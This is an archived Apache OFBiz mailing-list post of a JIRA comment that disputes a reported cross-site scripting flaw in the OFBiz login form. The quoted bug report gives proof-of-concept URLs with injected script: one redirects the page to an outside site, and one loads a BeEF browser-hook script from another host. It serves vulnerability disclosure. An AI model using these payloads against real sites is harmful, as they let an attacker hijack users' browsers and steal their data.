You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@ofbiz.apache.org by "BJ Freeman (JIRA)" <ji...@apache.org> on 2007/12/02 03:37:43 UTC
[jira] Commented: (OFBIZ-1476) XSS vulnerability in OFBiz Login
Form
[ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547550 ]
BJ Freeman commented on OFBIZ-1476:
-----------------------------------
I am not sure this is accurate.
If you only put in username or password the login fails.
The Following Errors Occurred:
The Password was empty, please re-enter.
there is a statement in the status window about tranfering data, but this is standard if you observe other pages when they are loading.
It is not transferring data to another site. unless you have some data you have capture this way.
in which case it would be nice to have a sample.
> XSS vulnerability in OFBiz Login Form
> -------------------------------------
>
> Key: OFBIZ-1476
> URL: https://issues.apache.org/jira/browse/OFBIZ-1476
> Project: OFBiz
> Issue Type: Bug
> Components: product
> Reporter: Emmanuel Saracco
>
> Hi,
> There is a Cross Site Scripting vulnerability in OFBiz login form that allow a attacker to stole user's data.
> PoC:
> * Redirection to another site:
> https://demo.hotwaxmedia.com/ecommerce/control/login?USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fwww.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a
> * BeEF injection:
> https://demo.hotwaxmedia.com/catalog/control/login?USERNAME=a%22%3E%3Cscript%20language=%22javascript%22%20src=%22http://192.168.4.2/beef/hook/beefmagic.js.php%22%3E%3C/script%3E%3Ca%20name=%22a
> Same thing using "PASSWORD" instead of "USERNAME".
> Bye
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.